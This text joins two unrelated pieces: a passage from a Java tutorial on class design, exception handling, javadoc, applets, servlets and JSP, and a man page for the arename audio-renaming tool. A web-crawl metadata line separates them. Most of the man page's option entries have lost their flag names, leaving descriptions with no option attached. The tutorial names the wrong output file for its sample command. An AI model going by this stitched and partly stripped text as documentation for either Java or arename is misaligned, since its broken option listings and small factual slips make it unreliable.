return ACCOUNT_TYPE;
}
public BigDecimal getWithdrawalLimit() {
return getBalance();
}
public void postInterest() {
double interest = getBalance().doubleValue() * getInterestRate();
setBalance(getBalance().add(new BigDecimal(interest)));
}
}
Another thing to notice about the relationship between
BankAccount and
SavingsAccount is that
all the instance variables in
BankAccount are declared as
private. This means
that they cannot be accessed from outside the class, not even by its subclasses.
Thus if the getWithdrawalLimit()
method in SavingsAccount
were coded like this:
return balance;
it would cause a compiler error.
BankAccount
supplies get...()
and set...()
methods for all its instance variables to help insure that they are
used correctly. There are sometimes good reasons for classes to expose
their instance variables to subclasses, or even to expose them to the
world by declaring them as
public; one occasionally
sees a Java class that looks like a C
struct, with public
instance variables and no methods. But generally, such a lack of encapsulation
reflects poor design.
The static class variable ACCOUNT_TYPE
is declared final, so it cannt
be changed. interestRate
is also static, since it is common to all instances of
SavingsAccount, but
it can be changed by using the static method
setInterestRate().
More information on these classes and the others from the sample
application can be found in the
javadoc
for the application.
An example application:
Let's take a simple example. A bank occasionally sends informational or
promotional letters to all its accountholders, or to all holders of a particular
kind of account, such as savings. We want a program that will produce printed
letters and addressed envelopes based on the following inputs:
Criteria defining which accountholders should receive the letter.
The name of a file containing the text of the letter.
Classes involved in this problem (representing "real-world" entities) include
BankAccount, subclasses
such as SavingsAccount,
Name and
Address (sub-objects of
BankAccount),
Letter,
Envelope,
and various "technical" classes representing files, databases, etc.
The example code has been radically simplified to make a
compact example, but it is a fully working application. Some of the things that are missing, such
as exception handling, are discussed below. The design has also been simplified;
for example, it would be preferable to use XML as a template for the
letter text, making it easy to plug in names, salutations, etc. Lots of
code for validity-checking inputs is also missing. But the example as given
is sufficient for illustrative purposes.
Here is a diagram of the classes and relationships involved in this application,
using the conventions of the industry-standard
UML (Unified Modeling Language):
LetterGenerator contains
the sequencing logic for the program. It uses the standard Java classes
FileInputStream and
FileOutputStream for
reading in the "boilerplate" letter text, and printing the content of the
envelopes and letters. (In a more complete application, a subsequent process would
take the output file and physically print the envelopes and letters.)
BankAccountFile
represents access to the database in which bank accounts are stored. In this
sample application, it merely returns a small collection of test accounts.
Note the use of a static initializer block to initialize the test accounts.
BankAccount, described above,
is the abstract superclass for
SavingsAccount and
CheckingAccount.
Bank accounts have instances of
Name and
Address
to store information on the account owner. Notice the three different constructors
in Name: One taking no arguments,
one taking a string that is parsed into its components, and one taking three strings
for title, first name, and last name. You might wonder why
Name and
Address are classes, and
not just strings stored in BankAccount.
Either implementation is possible, but making them separate classes simplifies
the coding of BankAccount, and
also makes the Name and
Address classes available
for use in other contexts. (Click on the links to see the
Java class definition files.)
Here is a UML sequence diagram showing the flow of messages between objects
in the process implemented by
LetterGenerator:
The objects involved are along the top axis of the chart.
(Iterator
is a Java interface defining iteration over a collection. You can think of it as
a pointer, or cursor, ranging over the elements in the collection.)
Messages (method invocations) from one object to another are indicated
by lines with an arrow; the object returned is shown by an arrow with a small
circle at the origin. The sequence (time flow)
is from top to bottom. An arrow from an object to itself indicates method
invocation or iteration within the same object; in that case, the lines of the
arrow are drawn to bracket the code that is being executed. In some cases,
pseudocode such as "while more accounts" is used to summarize what's going on.
The "actor" icon in the upper left indicates that the process is kicked off by
a user invoking the program with parameters specifying the boilerplate text,
and which accountholders are to be sent the letter. For example,
java LetterGenerator letter.txt S > lettersOut.txt
invokes the program to send the text of
letter.txt to the
holders of savings accounts, and print the result to
letter.txt.
These UML charts use a somewhat simplified form of the full notation.
Purists may object, but we feel that it is a waste of time and paper to
produce diagrams at an unnecessary level of detail. For Java in particular,
a small number of high-level diagrams in UML or similar format, plus
conscientious use of javadoc,
seems to be optimal in terms of value for time expended in documentation.
Exception handling in Java:
The PrintCubes program above
expected one command-line argument, an integer specifying the number
of cubes to print. The parameter is entered as a string, passed to the
program, and converted to an integer:
iterations = Integer.parseInt(argv[0]);
What if the user makes an error and enters, say "t" instead of "5"? The result will
be an output like this:
Exception in thread "main" java.lang.NumberFormatException: t
at java.lang.Integer.parseInt(Unknown Source)
at java.lang.Integer.(Unknown Source)
at PrintCubes.main(PrintCubes.java:8)
This is not a very obvious way of telling the user that "t" is not a valid parameter.
What has happened is a Java
NumberFormatException in the
process of trying to convert "t" into an integer. Since we can readily anticipate
this kind of error, we'd like to catch it and present a friendlier message to the
user. Java exception handling supports that, as shown in the following revised
initialization of iterations:
if (argv.length != 0) {
try {iterations = (new Integer(argv[0])).intValue();
}
catch(NumberFormatException exception) {
System.out.println("Usage: PrintCubes <number of iterations>");
System.out.println(" <number of iterations> must be an integer");
System.exit(0);
}
}
else iterations = 10;
The try block is the code in
which we anticipate that an exception may occur; the immediately following
catch block specifies which
kind of exception is anticipated, and contains the code to be executed if it occurs:
In this case, print an error message and exit. The error message presented to the user is now:
Usage: PrintCubes <number of iterations>
<number of iterations> must be an integer
If a method in a Java class anticipates an exception, but wants the method caller to
handle it, it may announce that fact by using the
throws keyword. As an example,
many methods in BufferedReader
and FileInputStream throw
IOException, for instance if a file
encounters a physical I/O error. The caller must decide what to do if this happens,
so methods are coded in FileInputStream
like this:
public int read(byte b[]) throws IOException {
. . . .
If a method throws an exception, any method that invokes it must either
have a catch block
identifying the exception, or announce that it throws the exception so
that its caller can handle it. If not, a compiler error will result.
You may have noticed an example in the code for
LetterGenerator: The
run()
method invokes methods in FileInputStream
but does not catch IOException,
so it throws it to its caller. The main()
method, which invokes run(),
also does not catch IOException,
so it must throw it. Ultimately, if there is no catcher, the exception causes
the program to terminate and print several error lines like what we saw above. In real
applications, the IOException
should be caught somewhere, at least for the purpose of printing a more
meaningful error message.
Documenting Java code with javadoc:
The javadoc program, supplied
with the Sun JDK, is, in our opinion, the best documentation tool ever developed
for programs. Most documentation schemes fail because they are too complex, require
too much work on the part of programmers (who really just want to get code working),
or maintain the documentation in separate files which must be (but rarely are)
updated when the code is changed. javadoc
generates documentation directly from the code, and requires only a modest investment
on the part of the programmer to produce a useful result.
There are three kinds of comments that can be used in Java code:
// This is a single-line comment.
/* This is
a multiline comment. */
/** This is
a javadoc comment. */
The third comment looks to the compiler like an ordinary multiline comment,
but the extra * flags it as meaningful to
javadoc. These comments,
along with the actual structure of the Java code, are used to generate
HTML documentation.
The best way to see how this works is to look at the
actual javadoc documentation,
along with the comments placed in the class source code files
(
LetterGenerator,
BankAccountFile,
BankAccount,
SavingsAccount,
CheckingAccount,
Name, and
Address).
Java Programs, applets, Java server pages, and servlets:
In addition to standalone Java programs, there are two types of programs associated
with the World Wide Web: Applets, encountered above, which are downloaded
and executed under control of the client web browser; and servlets, which
are invoked by HTML pages and run on the web server. Whereas
standalone programs are always entered via the
main() method, other methods must
be coded for applets and servlets.
An applet is invoked from an HTML page by code like this:
<applet code=MyApplet.class>
<param name=parameterName value=parameterValue>
. . . .
</applet>
MyApplet.class is the
name of the class file output by the Java compiler, and is downloaded to the
client. The applet code must be a subclass of
Applet. Methods that
applets typically override from Applet
include init(),
called by the browser to tell the applet that it has been loaded into the system;
start(),
called by the browser to tell the applet that it should start executing;
and stop(),
called by the browser to tell the applet that it should stop executing.
Applet, its superclasses,
and other Java classes provide a wealth of functionality to build applets
that provide graphics, sound, image display, animation, and other capabilities.
A servlet is also invoked by HTML code, typically resulting from some user
action such as submitting a form. The servlet runs on the server, though, not
on the client. Here is an example of servlet incovation:
<form action="/servlets/MyServlet" method="post">
This is similar to the invocation of a
CGI (Common Gateway Interface) script. MyServlet.class
must be the name of a class file containing a class named
MyServlet, which
must be a subclass of HttpServlet.
The server invokes the servlet through its
doGet() or
doPost() method,
depending on whether the action specified in the HTML is
get or
post. The servlet
then performs whatever action is appropriate (e.g., searching a
database), builds an HTML response, and sends it back to the client browser.
Java code can also be imbedded directly in HTML, using
Java server pages (JSPs), much like a scripting language. Here is
a very simple example; <% and
%> bracket the Java code:
<html>
<head>
<title>JSP example</title>
</head>
<%
out.print("Hello! It is now ");
out.print(new java.util.Date());
%>
</body>
</html>
This outputs a line like
Hello! It is now Fri Jul 05 23:43:56 MDT 2002
Unlike client-side scripting, an HTML page with embedded JSP code is converted and compiled
on the server into a servlet class and executed. (If you're interested, here is the
servlet Java code generated for this example by the
Apache Tomcat server.)
There is some
skepticism about JSP. Much of this boils down to the same thing that can be said of
ASP, client-side JavaScript, and other scripting technologies used on the web: Web pages
are necessarily dedicated to presenting a user interface, and mixing application logic
with UI code is bad practice. To this can be added the facts that HTML pages in general, and
JSP in particular, have very little structuring capability, and that web page coding
is often done by people with very little programming experience. All in all, JSP needs to be used carefully
if you expect to build a reliable and maintainable web site.
* * *
* * *
* * *
We have now briefly covered the high points of the Java language.
There are many aspects of programming in Java, ranging from Java Beans to inner classes to
user interface programming, that are beyond the scope of this short tutorial. For these,
we refer you to the links below. For programming practice, the basic tools, including good
graphical IDEs (Integrated Development Environments) are free or reasonably priced. Enjoy!
For a comparison of corresponding terms and concepts in
in Java, Smalltalk, and C++, and pointers to information about
other OOPLs, see the
OOPL comparison chart.
Dick Baldwin's Java page
has links to other information sources and an extensive set of Java
tutorials.
Gamelan
has links to various Java resources including articles, tutorials,
and source code.
Java 2 SDK from Sun.
Java 2 Enterprise Edition SDK from Sun. This is needed for servlets, among other things.
Forte (JDK) Java IDE from Sun. The "community edition" is free.
Eclipse, a highly-rated open-source IDE.
Jars.com Java download repository.
Coding "style" is usually more than style, and following the style of those
who are acknowledged experts is a good learning experience. Even where style is
just style, picking a style and using it consistently enhances the readability
of your code; using one style for all code written by a development team helps
convey a professional, "quality" approach to coding.
Looking at several style guides is a good exercise. Seeing what the issues
are, and getting different perspectives on them, will help in evolving a guide
that's right for your team.
Java Programming Style Guidelines by Geotechnical Software Services. These guidelines are based on standards from a number
of other sources, including Sun. They are concise, well-organized, and provide a rationale for each guideline.
Geotechnical Software Services'
home page contains other useful Java links.
Sun's recommended
Code Conventions for the Java Programming Language.
AmbySoft's
Coding Standards for Java, by Scott Ambler, who's also the lead author of
The Elements of Java Style, a book on Java coding style.
Draft Java Coding Standard by
Doug Lea. Doug teaches computer science at SUNY Oswego, and is a well-known C++ and Java expert.
Javadoc is Sun's standard way of documenting Java code. We highly recommend
using it, because unlike most other documentation schemes, the documentation
is based on special comments in the code itself, thus is more likely to be
kept up to date.
One of the "problems" frequently cited regarding Java versus C or C++ is performance.
This is now largely a myth; Java performance with current technology is adequate for the vast
majority of applications. Slow Java code is much more likely to be a result of poor design
than the wrong choice of language. If you do encounter performance problems,
Java Performance Tuning by Jack Shirazi. In addition to lots of tips on optimizing
code, the book also provides a methodology for analyzing performance problems, so you don't
waste time optimizing the wrong things. The book is also good "preventive medicine" for anyone
writing Java code for performance-sensitive applications. | http://www.outbacksoftware.com/java/java.html | crawl-002 | refinedweb | 8,244 | 51.68 |
Computational feces.
I used to think that PHP was the biggest, stinkiest dump that the computer industry had taken on my life in a decade. Then I started needing to do things that could only be accomplished in AppleScript.
Tags: computers, firstperson, mac
66 Responses:
Never tried AppleScript, but I'm pretty sure you're not alone!
It's true. At least PHP has something approaching a grammar.
(I actually kinda like the event+object model that AppleScript is an interface to; you can talk AppleEvents from saner languages using things like Python appscript (pretty sure there are equivalents for your major scripting language of choice).)
I once found myself writing a desktop publishing automation app with AppleScript. Shortly before going insane I discovered appscript, a Python (and now Ruby and Objective-C, apparently) library that exposes the underlying Apple Events mechanism and scripting dictionaries in a reasonable way. Anything you can do with AppleScript, you can do with appscript, and that way you get to use a programming language with fancy things like stack traces! It's been years since I touched it, but it was a godsend.
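For anyone lucky enough never to have seen it, here is roughly what the AppleScript side of that kind of automation looks like (a minimal sketch; it assumes iTunes is running with a track playing):

```applescript
-- Ask iTunes for the name of the track now playing.
tell application "iTunes"
    set trackName to name of current track
end tell
```

The English-like syntax is easy to read but famously hard to write: phrasings that would be interchangeable in English are syntax errors in AppleScript, which is much of what the complaints in this thread are about.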
Wow. I had no idea this existed, and opens up a bunch of opportunities for me to half-start projects, and then abandon them prior to completion.
Mac::AppleScript::Glue apparently does the same thing in the Perl/CPAN world.
So you have never had to write a .bat script?? Lucky man!
I completely agree; that's why I wrote Python classes that wraps around appscript. So, that way, I'm Applescripting in Python in ways that make total sense.
Too true. The applescript language itself is a horror to try to write in, though it's actually fairly easy to read. If perl is sometimes accused of being a "write-only" language, applescript is "read-only".
As others have said, the model and feature-set under the language is actually pretty decent. If you need to use it without going mad, appscript is the way.
Perhaps your hacks page needs an update, since it still claims "PHP is kinda cool."
;)
No, that's some other three-letter punk, not me.
...oh yeah. That's what I get for logging on before breakfast.
Last time I checked, JavaScript was a fully supported alternative for those APIs. That doesn't necessarily make them less horrible, though. :D
Huh?
You can use JavaScript to automate AppleScriptable applications using JavaScript.
I don't know about on Macs or anything (don't own a mac, don't want one), but on Windows boxen, you can access the iTunes services via javascript code run through the Windows cscript/wscript interpreter. I used to make scripts to automate various things talking to iTunes in this manner. It's twisted and sick, but darnit, it does work.
Examples:
boxen? seriously? what kind of autist still uses that terminology?
People who talk about the PC they built to play WoW as "my games rig"
I remember being asked to write a relatively simple app in AppleScript during an Internship, since it was a pain to set up Windows manually for display.
It would create 9 total Instances of various Programs, resize them, move them and initialize them (say, opening web-pages in Safari).
I can still hear the screams of the Mac I used.
Back in a former life (1995, in the glory days of System 7), I found myself needing to use AppleScript in order to get a copy of FileMaker Pro to talk to my then employer's WebStar web server. At the end of the project, I abandoned my own Mac in favor of a PC and learned C shortly thereafter. I don't know how much the language has evolved since then, but based on what you've written here in the past, my guess is "not much at all".
Regarding PHP, I think that language has actually gotten better over time. Of course, I've heard several folks utter the phrase "polishing a turd" with respect to the improvements there, so maybe it's just me.
Is there a language you actually like using these days?
Can't speak for jwz, but, in no particular order,
- C. Well, I don't _like_ it, but it works. That's at least something to respect.
- I'm actually warming up to Python. I still think the whitespace-as-syntax thing is a bullshit gimmick, but the language is... mostly decent.
- For quick and dirty, get-shit-done, Perl is still king. No question.
Just to rant, what with the surge of interest in pseudo-functional programming in Javascript, can we make a licence requirement for anyone trying that to actually at least read an article on functional programming? Because I don't think the vast majority of people doing this shit understand the point of it all, other than using anonymous functions as parameters everywhere. ('Cause it looks cool!') I don't expect them to understand lambda calculus - I doubt most of them have gotten very far past basic highschool algebra - but Jeebus. I recently saw some code where someone was trying, and failing, to implement something with a textbook 4-line recursive solution, in like 70 lines of crap, all written with the trendy "functional" style. I don't know if this is more cargo-cult or trend-junky behavior, but I'd almost rather read ca. 2001 "office web guru" PHP than this shit.
PHP is always going to have the "designed backwards" problem, no matter how many new features are piled on top of it. Nothing is ever going to remove the fact that the original version thought global variables and functions were all you needed and OO programming could be left for version 2... or maybe 5.
Because of that glorious history, every "polished" PHP class is littered with:
$this->foo and $this->bar()
instead of:
$foo and bar()
This is my least favourite feature of the language, because with years of experience in other OO languages I keep forgetting that I need to always tell PHP to operate on the damn class I'm writing now.
That's a rather week criticism of PHP. There is a lot wrong with PHP. But being explicit about your scope is something many argue for, and other languages behave similarly. It should be a a minor annoyance at best.
I don't care if other week [sic] languages have the same problem. A lot of languages with retro-fitted OO syntax have a similar problem, but they generally have the excuse that they're a lot older than PHP.
Searching global scope for functions before class local scope is a pretty clear indication of a language with its priorities bass-ackwards.
I think it is weird how the grammar is supposed to be "natural"... which leads to a casual, almost friendly tone... which belies the fact that you are telling all these applications what to do like some kind of cruel fascist.
tell application "iTunes"
go fuck yourself
end tell
I'm pretty sure that, once upon a time, there was an 'unfriendly' version of Applescript, i.e., one that looked like an actual programming language. Or maybe that just happened in a dream.
A long, long time ago, in a galaxy far, far, Mac OS 8, AppleScript used to come in dialects - several with all the keywords in different languages (and maybe a different grammar), and a planned version with a C-like syntax ("programmer's dialect"). Then they killed them.
Nowadays, enlightened people use the Objective-C Scripting Bridge framework/command line tool combo or the many libraries for doing the same with Ruby, Python, Perl, etc.
AppleScript itself is pretty much spells and leeches.
Another +1 for appscript. It brings much sanity to the world.
Once there was an applescript that could be written in OTHER NATURAL LANGUAGES other than english. Just to say how crazy that thing was. I'm so happy they dropped it.
Even of I even used to program in applescript/italian dialect, yes. O_O
Anyway, you silly snobby perlhead, when Perl 6 went on his "design by committee" permanent iatus, who d'you think kept the web wheels spinning? PHP got the torch. And it's not leaving it.
Even if some of the worst programmers in the world are using it.
Still it's hard to prove the java and .NET crowd is smarter.
I can put up with the COBOL-level verbosity of Applescript. I have never wanted to write more than simple automate-this-application scripts in it, and I can google for appropriate incantations as needed.
What I cannot abide is the half-ass Applescript control interface many applications have. You get the feeling that the implementers wrote interface code to enable the few scripts they tested, then stopped. If the dictionary says an object Foo contains objects Bar, you may or may not be able to iterate over the Bars in Foo.
The fundamental problem with English-like programming languages is that they set expectations way to high, that you can write anything you want and the computer will understand it.
Bob Bane!!! Is that you from the University of Maryland Vax Lab? Been a while. Enjoy a delicious Foo Bar!
Yep, still me. Currently at NASA Goddard - the last time I was paid to write code in a language that didn't suck rocks was ... 2002?
Maybe it's just me and my not getting the zen of Applescript, but when the standard dictionary says an application contains windows, I expect to be able to:
repeat with aWindow in windows
which doesn't work. Maybe I need to look for alternative incantations...
The major annoyance I find with Applescript is that it is so inconsistent between apps. Take Terminal. In Terminal, this does not work:
tell application "Terminal"
set my_tab to first tab of first window
get container of my_tab
end tell
Getting the container of something is pretty basic, and works in nearly everything. Not Terminal.
Or consider this. This does what you would expect in Terminal:
tell application "Terminal"
set current settings of first tab of first window to first settings set
end tell
However, this code, which one would reasonably expect in a sane language to be functionally identical, does not:
tell application "Terminal"
set first_set to first settings set
set current settings of first tab of first window to first_set
end tell
But with a slight modification, it does work:
tell application "Terminal"
set first_set to a reference to first settings set
set current settings of first tab of first window to first_set
end tell
Blech.
APIs differ everywhere; what makes AppleScript so annoying is that it claims to be like a programming language but english and has little other syntax than keywords, which means that the constructs should be polymorphic. It's as if you had to type array{8} for array indexing in one program and list in another.
So to go along with appscript and javascript_OSA there's FScript which is a load of awesome, if you like cocoa and smalltalk.
Congratulations and welcome to the club!
php though arguably worse.
When you say "AppleScript is better than PHP" it is impossible for anyone to believe that you have actually used AppleScript. Seriously.
try javascript ...
I had the same experience: AppleScript Insanity
AppleScript is a bit of a nightmare - how did anyone ever think that it was a good idea?
I did a little bit in PHP before I realised I had an alternative. So glad I get to work in decent languages these days.
Could you please elaborate on why do you think that PHP is a pile of shit?
They can't. Everytime people say this, they never back it up with any substance.
Do you think Facebook would work nearly as well as it does if PHP was such a pile of shit?
Give me a fucking break. Just because it's used in successful products doesn't mean it's not a stinking pile of shit.
Take your language evangelism to your own blog.
I _really_ want to know your full-fledged opinion on this, not trolling or anything; I would like to know it, if possible.
I make a living among other things, by delivering PHP-based stuff to my clients. I've done so for many years and I'm quite happy with the way I can do things in this language.
I've done some public, web-scale projects but mostly intranet stuff with a few hundreds or low thousands of users. LAPP is my stack of choice, and as of late, Eclipse and /or Netbeans for the IDE.
I've cringed a bit on the argument order of some functions, but in general this has been a great platform to work with.
That being said, I know who you are and where you come from (as a programmer, through your blog) and would appreciate your opinion.
The constant, constant stream of security flaws in PHP stems from the fact that they bolted on security (and modern innovations like, I dunno, not using global variables for everything!) long after it was deployed and in wide use. They've tried to incrementally repair all that shit, and made some progress, but can never succeed because those terrible decisions are enshrined at the lowest possible level. Cross-site scriping and SQL-injection holes are as endemic to the design of PHP as buffer overflows are to C: they are built in to the language. Sure, it's possible to write PHP code that doesn't fall into any of these tiger-pits; but in the grand scheme of things, it's unlikely. You're going to miss something, because it's fail-open instead of fail-safe.
Also, just like the fundamental design of Perl encourages you to use regexps for everything possible (since they are far and away the most obvious tool in the box) PHP encourages willy-nilly conflation of view and model/controller, which has been widely understood to be a terrible idea since roughly the Cretaceous. So in PHP, the most obvious way to just get something simple done quickly is a terrible way to do it, and that will come back and bite you in the ass later, even though you got there by thinking, "yeah but I'm in a hurry, so just this once."
And that's just off the top of my head. And I've been drinking. So there you go.
You're right in that conflation of view and model/controller is an obvious way to do things in PHP. Any beginner (and there are lots of these in the PHP world) would think, 'Aha! I'll do it like that.' And you didn't mention another obvious way of doing things in PHP, which is to have a separate PHP file to handle each web page. This is how PHP was meant to be used in the beginning.
But I never get bitten in the arse by these things because I never do them, because I know what I'm doing, and I'm not an idiot. I never think 'just this once', even when I'm in a hurry.
So PHP isn't shit because you're a real man, and you know what you're doing, so stand back, ladies?
Uhhhh.... we got a rising debate star here folks.
It's like being back at school again!
Just to save some personal dignity, I didn't suggest PHP in the other thread out of any loyalty to PHP. It's just there, and convenient for quick shit jobs where I can't be bothered installing/compiling/packagemanaging some behemoth scripting environment. I'm glad you got something that sort of works in the end.
Thanks :-)
Just one more: In your opinion, Which one is the language and/or framework that least encourages bad design and is least fail-open?
All these points pale in comparison to PHP not having a sane, simple command line debugger that ships with the product. Perl, Python, Java and many, many others do. PHP has XDebug, which is is clever and maddening at the same time.
I enjoy working in PHP more than, say, VBScript.
I wrote this summary a while ago, and you asked, so here goes:" [], which goes into detail about the following fundamental flaws:
1. Bad recursion
2. Many PHP-modules are not thread safe
3. PHP is crippled for commercial reasons
4. No namespaces
5. Non-standard date format characters
6. Confusing licenses
7. Inconsequent function naming convention
8. Magic quotes hell
9. Framework seldom used
10. No Unicode
11. Slow
Then there is the mind-set of the PHP language designers and community, which is deeply flawed. Ian Bicking's "PHP Ghetto" article [] sums up the problem with PHP's design and community pretty well:
I think the Broken Windows [] theory applies here. PHP is such a load of crap, right down to the standard library, that it creates a culture where it's acceptable to write horrible code. The bugs and security holes are so common, it doesn't seem so important to keep everything in order and audited. Fixes get applied wholesale, with monstrosities like magic quotes []. It's like a shoot-first-ask-questions-later policing policy -- sure some apps get messed up, but maybe you catch a few attacks in the process. It's what happened when the language designers gave up. Maybe with PHP 5 they are trying to clean up the neighborhood, but that doesn't change the fact when you program in PHP you are programming in a dump.
Jonathan Ellis' "Why PHP sucks" article []."
There is also a lot of great stuff about why PHP is so bad on [] [broken link], quoted in "Why PHP sucks, Part III" []:
"I don't know how to stop it, there was never any intend to write a programming language [...] I have absolutely no idea how to write a programming language, I just kept adding the next logical step on the way".
There you go. The designer of PHP himself admits he literally had no idea what he was doing! It's absolutely foolish to teach PHP as a first programming language. Kids deserve much better than that.
-Don
[Then some moron derped "Smarty is a good way to keep template designers out of your PHP code" so I followed up:]
You are absolutely wrong about Smarty, which is a horribly conceived and implemented disaster. Don't be such a yapping apologist, just because you managed to throw together your home page in PHP without knowing any other languages.
I am speaking from experience, having had to use PHP and Smarty, and having read the source code to Smarty in an vain attempt to figure out how it worked and why it was so difficult to get it to do even the simplest things correctly. I've been much happier using other better designed templating systems, which I will describe below.
You should read Wolf's Rants about PHP: Truth about short open tags and Smarty [].
After this point, the discussion about the tags comes from shopt open tags to "then what should I use for templating?!? and people would go "Wooo! Smarty! Go with Smarty!", and would make me slap people senseless just for saying that. Just as hating PHP for number of damn good reasons, I have a number of hating Smarty to go along with it. Brace yourself, because here it goes:
1. Smarty is programming language
2. Smarty is overkill in majority of cases
3. Speed: Smarty isn't a solution. it's the major problem.
and here go the details about stated points above:
1. Most people would argue, that Smarty is a good solution for templating. I really can't see any valid reasons, that that is so. Specially since "Templating" and "Language" should never be in the same statement. Let alone one word after another. People are telling me, that Smarty is "better for designers, since they don't need to learn PHP!". Wait. What? You're not learning one programming language, but you're learning some other? What's the point in that, anyway? Do us all a favour, and just *think* the next time you issue that statement, okay?
2. I think, that "overkill" is an understatement. You're trying to disguise simple outputting in a complex set of classes,which implements a programming language inside of it -- Definitively overkill". "But it does caching". No, not really. "Caching", in the terms of Smarty is nothing else than converting that template code into PHP. See? I told you there is no point in using Smarty. It doesn't make your life easier. It doesn't make developer's life easier, and it doesn't make server's life easier.
3. The previous paragraph says it all about the speed slugs in Smarty, but I feel the urge to recap that:
1. "caching" mechanism sucks. It's not a proper caching. It's just a conversion of one interpreted language to another one. and in very unoptimized way. If you want to do the proper cachin, go with APC, Zend optimiser or EAcellerator.
2. The implementation of one interpreted language in another interpreted language does nothing but slow everything down
[I wrote some constructive criticism about how templating should be done in the rest of the message, here:
Looks like PHP is on par with Perl, Ruby. It's a solid runner to Python and in a completely different league than everything else.
I don't think the broken windows theory applies to the PHP world.
In my opinion, people write crap PHP because the companies that pay for these sort of applications actually want a cheap, shoddy product (well cheap, mainly). Therefore they choose PHP because it's the easiest language to learn, and so they can employ cheap programmers, who are also crap. Then the companies encourage these programmers to write crap code as quickly as possible. No effort is spent on maintainability because these sorts of companies don't care about that, and they wouldn't even realize if their programmers were writing anything good or not. There is a culture of crap. It's not that there's a broken window here or there, it's just that most PHP applications were built like a shanty town right from the word go.
PHP5 has namespacing, magic quotes should always be off anyway, and see the mbstring extension for Unicode support.
I agree with most of the rest of your post, though I quite like PHP (or should I say I'm very comfortable with it) due to having an intimate familiarity with the language at this point. To each his own.
What's wrong with PHP:
What's wrong with Smarty:
I also think Smarty sucks big time. Tried it once, deleted it after a few minutes.
Lets not forget that Facebook had to write their interpreter:
Do you think Facebook would have written it's own interpreter if PHP wasn't such a pile of shit?
Facebook wrote (basically) a PHP-to-C compiler, for speed. My complaints about PHP have nothing to do with performance, and anyway, not all sites have Facebook's performance requirements.
Damn you for making me defend PHP, but you're slamming it for the wrong reasons.
Thanks for the clarification. Didn't realize that FB wrote a PHP to C++ translator and than complied with g++:
Summary
* I was supporting the "PHP is slow" complaint voiced in other comments/links
* Doesn't using C++ solve other PHP problems, like multi-threading?
* Does translating to C++ imply PHP is fundamentally flawed, not just slow?
* What language/framework should we use for websites? Python? Perl? ROR?
Jeff's Theorem:
All websites becomes usenet.
Doesn't using C++ solve other PHP problems, like multi-threading?
No. Not only does PHP lack thread-safety (variable/object synchronization/locking), the core library functions and extensions that are currently not thread-safe will need to be rewritten to take advantage of the feature. Translating to C++ doesn't have anything to do with this.
Does translating to C++ imply PHP is fundamentally flawed, not just slow?
No? Why would it? PHP is flawed in many aspects, but translating to C++ doesn't address them. It just means every time a page is requested there's no interpretation going on, since the script has been translated and compiled to a native binary.
What language/framework should we use for websites? Python? Perl? ROR?
Use whatever you're comfortable with. I've been writing PHP for 10 years, and just because it isn't perfect doesn't mean it isn't a usable language if you understand its flaws and are aware of its limitations.
Because monolinguistic people like you use it as their first and only language, without realizing its deep and horrible flaws.
If you learned a second language, you'd realize that programming doesn't have to be so horrible.
Oh hi Don, big fan of yours. I love your cranky programmer aficionado screeds, and micropolis. ^_^
It seems that you are a programmer of note, so kudos to you.
But I'm not monolingual, and inferring so from a simple question it's not that smart.
Well, it's either monolingual, or dense. Take your pick.
though to be fair to you, I wanted to know jwz's full opinion too, even if I already know PHP Is flawed, and why. I like reading big rants from JWZ and Don Hopkins. So I take that last comment back.
Everything went better than expected
:-) | http://www.jwz.org/blog/2011/05/computational-feces/ | CC-MAIN-2014-10 | refinedweb | 4,306 | 72.36 |
27 September 2012 03:55 [Source: ICIS news]
SINGAPORE (ICIS)--China’s Shandong Haili Chemical Industry is currently running its new 150,000 tonne/year adipic acid (ADA) plant in Jiangsu province at around 50% of capacity, a company source said on Thursday.
The plant, which is the company’s first ?xml:namespace>
“Currently, the operating rate was just around 50% since it just started up,” the source said.
The company started trial runs at the new unit in mid-September, the source said.
The plant’s start-up was delayed several times because of weak market demand.
Shandong Haili has also built a second 150,000 tonne | http://www.icis.com/Articles/2012/09/27/9598976/Chinas-Shandong-Haili-runs-new-ADA-unit-at-around-50.html | CC-MAIN-2014-41 | refinedweb | 108 | 63.49 |
Automatically rename audio files by tagging information
arename [OPTION(s)] FILE(s)...
Sets the ambiguoususefirst option. See below for details.
Prints the version of the arename script and the version of the Perl module that contains most of the code. These versions should be the same; if they differ, that indicates a possibly broken installation.
Copy files instead of renaming (moving). This can be useful to copy tracks from your audio archive to a portable device for example.
Enable debugging output. This actually sets `verbosity' to 10000 and causes very noisy output. You probably want something less verbose, like `--verbosity 20'.
Do not make use of hooks of any sort (neither global nor local ones).
Do not use configuration profiles (see below). Overwrites the useprofiles setting.
Go into dryrun mode. This means, that no action will be taken. arename will print what it would do, if called without -d.
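With -d it is safe to experiment; a first session might look like this (the file names and directory are, of course, illustrative):

```
$ arename -d Music/*.ogg
$ arename -d --verbosity 20 Music/*.flac
```

Both invocations only report the renames arename would perform; nothing is actually moved.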
Explicitly enable hooks.
Overwrite files if needed.
Display a short help text.
List the current configuration in the actual configuration format.
Lists all file types currently supported by arename, one type per line.
Lists all recognised file name extensions for type <type>, one extension per line. If a comma-separated list of types is given, extensions for all listed types are listed.
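For example, to see what arename can handle on your system (the output depends on the installed Audio::Scan version, so none is reproduced here):

```
$ arename --list-file-types
$ arename --list-ext-for-type ogg,flac
```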
Print a list of profile names defined in the active configuration. (This is primarily used by the zsh completion for the --profile option.)
Read a local config file (./.arename.local). Overwrites the uselocalrc configuration setting.
Read filenames from stdin after processing files given on the command line. It reads one file name per line, which means that file names containing newlines are not supported.
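The name of the switch that enables this mode is not preserved in this excerpt; the snippet below writes it as --stdin purely as a placeholder, so substitute the real option name from your arename installation. Combined with find(1), which emits one file name per line:

```
$ find Music -type f -name '*.flac' | arename --stdin
```

Note that, as stated above, file names containing newlines cannot be passed this way.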
Display version information.
Sets the `verbosity' setting to `integer-value'.
When a file is skipped, because its name would not change, this option will cause arename to suppress any output. This sets the `suppress_skips' option. Note that if the `verbosity' setting is at a high enough level, you may still get messages about the file being processed in the first place.
Read file instead of ~/.arenamerc.
Read file after ~/.arenamerc and before ./.arename.local.
Define a prefix for destination files.
Define a list of one or more profiles to use forcibly, no matter if they would be activated normally or not.
Define a template, that will be used for files that contain a compilation tag.
Define a generic template (for all files that do not contain a compilation tag).
Set a user defined variable to a given value (see "User defined variables" below).

If changes to the --long-option interface are done, that will happen with an appropriate deprecation phase, so users can adjust. Incompatible changes from version 3.x to 4.0 can be found in the project's CHANGES file, and general advice about incompatible changes from major version to major version is documented in the UPGRADING file.
The following options are deprecated and will be removed in a later version of arename.
